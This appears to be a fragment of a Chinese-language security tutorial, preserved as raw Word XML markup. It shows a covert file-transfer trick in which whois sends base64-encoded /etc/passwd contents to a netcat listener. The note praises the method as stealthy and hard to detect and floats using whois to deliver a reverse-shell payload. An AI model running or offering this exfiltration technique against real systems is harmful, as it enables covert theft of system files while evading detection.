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181.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,3637" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:3637;width:82;height:322" coordorigin="1177,3637" coordsize="82,322" path="m1217,3641l1217,3641,1217,3641,1217,3641,1217,3641,1217,3641,1217,3641,1217,3641,1217,3641,1217,3641,1217,3641,1217,3641,1217,3641,1217,3641,1217,3641,1217,3641,1217,3641,1217,3642,1217,3642,1217,3642,1217,3642,1217,3642,1217,3642,1217,3643,1217,3643,1217,3643,1217,3644,1217,3644,1217,3644,1217,3645,1217,3645,1217,3646,1217,3646,1217,3647,1217,3647,1217,3648,1217,3648,1217,3649,1217,3650,1217,3651,1217,3651,1217,3652,1217,3653,1217,3654,1217,3655,1217,3656,1217,3657,1217,3658,1217,3659,1217,3661,1217,3662,1217,3663,1217,3664,1217,3666,1217,3667,1217,3669,1217,3670,1217,3672,1217,3674,1217,3676,1217,3677,1217,3679,1217,3681,1217,3683,1217,3685,1217,3688,1217,3690,1217,3692,1217,3694,1217,3697,1217,3699,1217,3702,1217,3705,1217,3707,1217,3710,1217,3713,1217,3716,1217,3719,1217,3722,1217,3725,1217,3729,1217,3732,1217,3735,1217,3739,1217,3743,1217,3746,1217,3750,1217,3754,1217,3758,1217,3762,1217,3766,1217,3771,1217,3775,1217,3780,1217,3784,1217,3789,1217,3794,1217,3798,1217,3803,1217,3808,1217,3814,1217,3819,1217,3824,1217,3830,1217,3835,1217,3841,1217,3847,1217,3853,1217,3859,1217,3865,1217,3871,1217,3878,1217,3884,1217,3891,1217,3898,1217,3905,1217,3912,1217,3919,1217,3926,1217,3933,1217,3941e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:280.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,5617" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:5617;width:82;height:322" coordorigin="1177,5617" coordsize="82,322" path="m1217,5622l1217,5622,1217,5622,1217,5622,1217,5622,1217,5622,1217,5622,1217,5622,1217,5622,1217,5622,1217,5622,1217,5622,1217,5622,1217,5622,1217,5622,1217,5622,1217,5622,1217,5623,1217,5623,1217,5623,1217,5623,1217,5623,1217,5623,1217,5624,1217,5624,1217,5624,1217,5625,1217,5625,1217,5625,1217,5626,1217,5626,1217,5627,1217,5627,1217,5628,1217,5628,1217,5629,1217,5629,1217,5630,1217,5631,1217,5632,1217,5632,1217,5633,1217,5634,1217,5635,1217,5636,1217,5637,1217,5638,1217,5639,1217,5640,1217,5642,1217,5643,1217,5644,1217,5645,1217,5647,1217,5648,1217,5650,1217,5651,1217,5653,1217,5655,1217,5657,1217,5658,1217,5660,1217,5662,1217,5664,1217,5666,1217,5669,1217,5671,1217,5673,1217,5675,1217,5678,1217,5680,1217,5683,1217,5686,1217,5688,1217,5691,1217,5694,1217,5697,1217,5700,1217,5703,1217,5706,1217,5710,1217,5713,1217,5716,1217,5720,1217,5724,1217,5727,1217,5731,1217,5735,1217,5739,1217,5743,1217,5747,1217,5752,1217,5756,1217,5761,1217,5765,1217,5770,1217,5775,1217,5779,1217,5784,1217,5789,1217,5795,1217,5800,1217,5805,1217,5811,1217,5816,1217,5822,1217,5828,1217,5834,1217,5840,1217,5846,1217,5852,1217,5859,1217,5865,1217,5872,1217,5879,1217,5886,1217,5893,1217,5900,1217,5907,1217,5914,1217,5922e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:336.600pt;width:348.600pt;height:97.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:452.400pt;width:353.399pt;height:234.6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利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用whois传输文件：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传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>输机：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root@john:~#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whois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-h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127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-2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-p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4444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`cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-2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/etc/passwd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|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-2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base64`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接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>受机：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root@john:/tmp#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-23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nc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-l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-v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-23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-p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4444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|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sed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-23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"s/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//g"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|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-23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base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-25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-d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4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6476" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>优点：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适用于隐蔽传输</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。最小化被发现。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>缺点：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适</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>用于传输小文件。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42.199pt;width:7.200pt;height:7.2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后者的话：wh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ois是否同样适用于payload的反弹，是一个非常有趣的实验。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